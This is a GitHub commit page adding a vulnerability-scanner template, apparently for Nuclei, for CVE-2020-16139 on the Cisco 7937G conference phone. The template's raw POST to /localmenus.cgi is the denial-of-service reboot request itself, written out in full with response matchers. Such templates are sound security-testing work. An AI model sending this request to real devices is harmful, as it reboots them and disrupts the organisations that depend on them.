Merge pull request #441 from pikpikcu/patch-22

Add CVE-2020-16139 Cisco 7937G Denial-of-Service Reboot Attack 🔥
patch-1
bauthard 2020-09-10 19:24:00 +05:30 committed by GitHub
commit d81003a4c6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

28
cves/CVE-2020-16139.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2020-16139
info:
name: Cisco 7937G Denial-of-Service Reboot Attack
author: pikpikcu
severity: low
# Refrence:-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
requests:
- raw:
- |
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/xml"
- type: word
words:
- 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'